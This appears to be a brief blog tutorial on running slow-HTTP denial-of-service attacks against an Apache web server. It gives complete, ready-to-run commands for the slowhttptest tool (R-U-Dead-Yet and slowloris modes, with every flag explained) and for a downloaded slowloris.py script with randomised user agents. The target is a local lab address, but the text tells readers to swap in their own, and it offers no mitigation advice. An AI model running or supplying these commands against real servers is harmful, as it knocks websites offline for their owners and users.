Hello everyone and welcome back !
Today we will be doing some DOSing.
In order to DOS our apache server we have to start it:
service apache2 start
-and lets edit the html file however we want
nano /var/www/html/index.html
Once you save it, we can proceed.
Visit: github.com/gkbrk/slowloris
or any other github that has slowloris.py and looks legit.
Download that and unzip it.
Also we need the slowhttptest tool:
sudo apt-get install slowhttptest
-And now we are ready.
In order to DOS using slowhttptest we can:
slowhttptest -c 400 -B -i 10 -r 200 -t GET -u http://192.168.1.129 -x 24 -p 5
-the -c option is how many connections there will be, -B specifies the “r u dead yet” attack type
(here we can use -H instead which is for slowloris.), -i is the interval time in seconds in between the attacks, -r is the rate per second, -t is the method, -u the link , -x the max length of random data in bytes, -p is interval to wait in seconds
-To add the output in the end you can add: -g -o ./output
-And now statistics will be stored in csv and html files.
-Okay great! So that was 2 types of DOS; Now lets do slowloris attack again but from our slowloris.py :
sudo python ./slowloris.py 192.168.1.129 -p 80 -v -ua –sleeptime 10
HINT – always change 192.168.1.129 to your ip (ofc)
-p is a port
-v means verbose (prints out more)
-ua means randomize user agents (google browser agents if you dont know what i mean)
–sleeptime is sleep time in between attacks
-And thats it !
Thank you so much for visiting and have a nice day 🙂
